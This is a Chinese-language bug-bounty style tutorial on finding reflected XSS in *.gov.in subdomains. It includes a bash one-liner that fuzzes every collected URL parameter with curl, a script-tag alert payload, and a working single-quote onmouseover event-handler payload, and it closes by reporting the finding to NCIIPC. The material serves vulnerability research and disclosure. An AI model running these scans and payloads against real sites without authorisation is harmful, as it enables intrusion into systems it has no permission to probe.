什么是Reflected XSS Reflected XSS(反射型XSS)是一种安全漏洞,当应用程序接收 HTTP 请求中的数据并将其存储在响应中而没有对其进行正确过滤和清理时,就会发生这种情况。
让我们一步一步来 选择域名:*.gov.in第1步:查找所选域下所有可能的子域第2步:选择任意一个子域第3步:使用Paramspider等工具找出所有可能的参数- https:<span class="code-snippet__comment">//github.com/devanshbatham/ParamSpider</span>
复制代码
第4步:检查所有直接反映特殊字符的 url。
要自动化,请使用以下脚本:- cat urls.txt| egrep -iv <span class="code-snippet__string">".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)"</span> | qsreplace <span class="code-snippet__string">'"><()'</span>| tee combinedfuzz.json && cat combinedfuzz.json | <span class="code-snippet__keyword">while</span> <span class="code-snippet__built_in">read</span> host <span class="code-snippet__keyword">do</span> ; <span class="code-snippet__keyword">do</span> curl --silent --path-as-is --insecure <span class="code-snippet__string">"<span class="code-snippet__variable">$host</span>"</span> | grep -qs <span class="code-snippet__string">""><()"</span> && <span class="code-snippet__built_in">echo</span> -e <span class="code-snippet__string">"<span class="code-snippet__variable">$host</span> \033[91m Vullnerable \e[0m \n"</span> || <span class="code-snippet__built_in">echo</span> -e <span class="code-snippet__string">"<span class="code-snippet__variable">$host</span> \033[92m Not Vulnerable \e[0m \n"</span>; <span class="code-snippet__keyword">done</span> | tee XSS.txt
复制代码
该脚本将这些参数显示为易受攻击的:
第5步:立即手动尝试:
让我们尝试一下基本的 XSS 负载:- "><span class="code-snippet__tag"><<span class="code-snippet__name">script</span>></span>alert(1);<span class="code-snippet__tag"></<span class="code-snippet__name">script</span>></span>
复制代码
不起作用:
无弹出窗口:
让我们从头开始 只需尝试:单引号
不存在输入验证或清理:
现在尝试一些事件:- <pre class="code-snippet__js" data-lang=""><code>' onmouseover=alert(1);></code></pre>
复制代码
输入有效负载后将鼠标悬停在链接上即可执行它。 我们看一下源代码:
我们遇到了 XSS,现在向 NCIIPC 报告
|